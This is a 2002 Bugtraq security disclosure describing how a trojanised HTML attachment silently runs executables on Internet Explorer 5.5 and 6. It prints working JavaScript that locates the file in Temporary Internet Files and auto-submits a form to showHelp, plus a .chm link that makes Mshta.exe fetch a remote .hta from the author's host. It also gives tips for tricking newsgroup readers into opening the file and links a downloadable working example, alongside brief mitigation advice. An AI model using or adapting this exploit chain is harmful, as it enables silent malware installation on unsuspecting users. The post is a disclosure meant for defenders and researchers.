[24187] in bugtraq
HELP ! : Trojanised HTML: Internet Exporer 5 and 6 [technical exercise]
daemon@ATHENA.MIT.EDU (http-equiv@malware.com)
Fri Feb 8 03:29:07 2002
Message-Id: <200202072352.g17Nqawi083988@mail6.megamailservers.com>
Date: Thu, 7 Feb 2002 23:49:29 -0000
To: <bugtraq@securityfocus.com>
From: "http-equiv@malware.com" <http-equiv@malware.com>
Reply-To: http-equiv@malware.com
Thursday, February 7, 2002
Default installation of Internet Explorer 5.5 and 6.0 still allows us
to execute files on default installations of the target computer,
technically trivial silent delivery and installation of an executable
on the target computer.:
We cobble together new and old Components as follows : -
1. Courtesy of Georgi Guninski (http://www.securityfocus.com/bid/1033)
2. Courtesy of Georgi Guninski (http://www.securityfocus.com/bid/2456)
3. Mshta.exe http://www.malware.com/foobar.hta
The manufacturer has done a really tremendous job of tightening down
any possibility to effect either 1 or 2 above. Nothing can be
activated through the Temporary Internet Files unless full path names
are known for both showHelp calling and Click() of our link.
Previously it was possible as long as all components were in the same
directory and only file names known.
Nevertheless:
We are able to retrieve from the Temporary Internet File our
trojanised html, determine the location of it, write this location
out to our showHelp call and thereafter execute our remote link.
What?
We create a very simple *.html file like so:
<bgsound src="http://www.malware.com/malware.chm">
this will pull our *.chm into the Temporary Internet File
when then include the Guninski scripting to determine the location of
our *.html file like so:
malware=document.URL;
path=malware.substr(-0,malware.lastIndexOf("\\"));
path=unescape(path);
we then take that location information and write it to a simple html
form like so:
document.write('<FORM name="malware"
ACTION="javascript:window.showHelp(document.forms[0].elements
[0].value)">');
document.write('<form><input type="hidden" size="40" maxlength="80"
value="'+path+'\\malware[1].chm"></form>');
technical note: it seems the myriad of patching to date does not make
it possible to pass the location directly to the showHelp call. It
must be written to the form which can then be automatically submitted:
setTimeout('document.malware.submit()',5000);
before we do all that we create our very simple malware.chm and
include our link object like so:
C:\WINDOWS\SYSTEM\Mshta.exe,http://www.malware.com/foobar.hta
this is particularly interesting as we are able to pass a link to the
mshta.exe, which in turn will open from the remote site our *.hta
which includes our executable. All without warning.
technical note: the possibility is excellent to repeat the entire
process above directly inside the *.chm file and drop an *.exe from
within the *.chm into the same Temporary Internet File. Using our
Guninski scripting to determine the location of the *.chm and write
that to the link parameter within it: value="'+path+'\\malware
[1].exe"> and execute it.
So what happens?
We construct our trojanised *.html file and send it off to our target
computer. This can be via mail or news. The recipient receives the
mail message and attached *.html file. We then convince our
unsuspecting recipient to open our *.html. This should be quite
trivial, particularly in news as the attached file is in fact nothing
more than a 500 byte html file.
Consider the following scenario in your favourite web design news
group:
Carefully note: there is a hardened security warning when attempting
to open attached *.html file. However our combination call for
assistance coupled with nothing more than a legitimate *.html file
should prove more than tempting:
(screen shot: http://www.malware.com/duh.png 18KB)
Why does it happen?
Because our simple *.html file is an attachment, security has it
transfer to the Internet Temporary File for opening, under the
security browser's settings. However, precisely because it is
physically opened within the TIF, we can use our Guninski scripting
to determine the exact location, write that exact location to our
form and call our *.chm where it too resides.
Working Example: (includes harmless *.exe -- the *.chm is hardcoded
for win98)
[note: due to pathetic technical reasons our *.chm is off-site and
may delay in transferring to the TIF and could possibly fail]
nb: working example must be attached to mail or news
http://www.malware.com/help!.zip
Notes:
1. Be aware of "innocent" *.html files in mail and news
2. Disable Active Scripting and Active X controls
3. Disable the HHCtrl ActiveX control
[see:http://www.kb.cert.org/vuls/id/25249 ]
4. Disable or Remove Mshta.exe [although if an *.exe embedded
directly into the *.chm then this has no impact]
5. None.
Critical Note: we are seeking a competent fast hosting service, that
can maintain exotic mime types on the server (including all windows
media files, *.chm files, *.mhtml files etc], we cannot demonstrate
when slob services cannot maintain the correct mime types on the
server, and files parse as text regardless of what they are. We don't
require much, +/-25MB space, handful of email addresses, must have
PHP, server should be fast and stable. Not much bandwidth required,
only +/-1.2 million hits since June 2002. Contact sinkhole @
malware.com
end call
--
http://www.malware.com
